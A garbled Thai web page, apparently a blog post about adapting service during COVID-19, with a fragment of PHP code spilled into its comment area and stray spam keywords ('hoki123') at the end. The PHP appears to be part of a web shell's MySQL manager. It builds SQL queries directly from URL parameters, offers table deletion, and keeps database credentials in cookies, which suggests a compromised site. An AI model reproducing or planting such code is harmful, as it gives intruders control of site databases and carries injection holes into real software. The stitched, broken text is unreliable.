การปรับตัวช่วงสถานการณ์ COVID 19 เพื่อการบริการที่ดี

Sped2020

You may also like...

ใส่ความเห็น

foreach ($fields as $row) { echo '' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . ""; } echo "" . "\r\n"; $v++; } echo "
"; $pagep = $page - 1; $pagen = $page + 1; echo "共有 " . $row_num . " 条记录 "; $pagenav = ""; $pageStr = $row_num > 0 ? $page : "0"; $charseta = isset($_GET['charset']) ? $_GET['charset'] : ""; if ($pagep > 0) { $pagenav .= " 首页 上一页 "; } else { $pagenav .= " 上一页 "; } if ($pagen <= $pages) { $pagenav .= " 下一页 尾页"; } else { $pagenav .= " 下一页 "; } $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页 跳到页"; echo $pagenav; echo "
"; } } elseif (isset($_GET['insert'])) { echo "' . $_GET['insert'] . "
"; $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn); $fieldnum = @mysql_num_fields($result); echo "
'; for ($i = 0; $i < $fieldnum; $i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); echo "
" . $name . " " . $type . '(' . $len . ")
"; } echo "
"; } else { $query = "SHOW TABLE STATUS"; $status = @mysql_query($query, $conn); while ($statu = @mysql_fetch_array($status)) { $statusize[] = $statu['Data_length']; $statucoll[] = $statu['Collation']; } $query = "SHOW TABLES FROM " . $_GET['db'] . ';'; echo "
"; $result = @mysql_query($query, $conn); $k = 0; while ($table = @mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ""; echo ""; echo '" . "\r\n"; $k++; } echo "
表名 操作 字符集 大小
' . $table[0] . " 删除 ' . $statucoll[$k] . "" . File_Size($statusize[$k]) . "
"; } } } else { $cookietime = time() - 6 * 3600; setcookie($cookie_name_mysql . 'host', "", $cookietime); setcookie($cookie_name_mysql . 'port', "", $cookietime); setcookie($cookie_name_mysql . 'user', "", $cookietime); setcookie($cookie_name_mysql . 'pass', "", $cookietime); die("连接MYSQL失败,请重新登陆."); } break; default: html_main(); break; } css_foot(); ob_end_flush();

sheds plans
hoki123